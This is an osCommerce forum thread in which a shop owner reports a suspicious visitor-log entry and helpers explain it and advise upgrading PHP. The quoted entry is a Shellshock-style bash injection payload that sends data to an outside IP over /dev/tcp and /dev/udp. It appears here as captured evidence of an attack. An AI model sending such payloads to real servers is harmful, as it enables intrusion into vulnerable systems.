Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

What is this person doing?


drillsar

Recommended Posts

I have installed supertracker  and i  find this...

Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"

Referred By: /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?" target="_blank">() { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?

 

where mysitexxxx = my site

 

with 3 different ways  maybe try of hacking?

Link to comment
Share on other sites

@@rory1  That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran".

 

My bet is that it's a hack attempt, or trying to get information for one.

 

Regards

Jim

See my profile for a list of my addons and ways to get support.

Link to comment
Share on other sites

If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that?

 

You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher.

 

Regards

Jim

See my profile for a list of my addons and ways to get support.

Link to comment
Share on other sites

PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version.

 

Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5.

 

Regards

Jim

See my profile for a list of my addons and ways to get support.

Link to comment
Share on other sites

Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc.

 

PHP 5.5 is still being actively maintained, so I think it is pretty safe.

 

Regards

Jim

See my profile for a list of my addons and ways to get support.

Link to comment
Share on other sites

Thank you kymation,
 
   I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc.

 

As I am looking at around 100+ of such things.  I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just a admin interface now for turning on and off items?

 

This ability wasn't present with the older versions on my host so it go me to wondering if 5.5 has a special focus to ensure better security.

It also got me curious what would be relevant for security or functionality for osCommerce.  I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet.  Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose.

 

-BP

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...